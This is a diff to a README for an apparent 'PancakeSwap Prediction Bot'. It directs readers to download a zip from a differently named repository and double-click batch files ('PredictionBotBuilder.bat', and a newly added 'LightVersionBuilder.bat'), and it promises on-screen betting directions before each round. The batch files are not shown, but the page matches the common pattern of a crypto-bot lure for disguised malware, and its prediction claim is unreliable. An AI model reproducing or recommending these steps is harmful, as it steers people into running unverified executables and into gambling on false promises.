CoinSwapPump/PancakeSwapPredictionBot2023/README.md

 1. Download the Full Repo [Github](https://github.com/CoinSwapPump/PumpDumpDedector/archive/master.zip).
 2. Unzip ``master.zip``
 3. Double click `PredictionBotBuilder.bat`
+4. If your current internet is of poor quality, please build the light version => `LightVersionBuilder.bat`
-4. The direction you need to play will appear on the screen that opens 1.20 minutes before each new round.
+5. The direction you need to play will appear on the screen that opens 1.20 minutes before each new round.
-5. Enjoy!
+6. Enjoy!

 # Features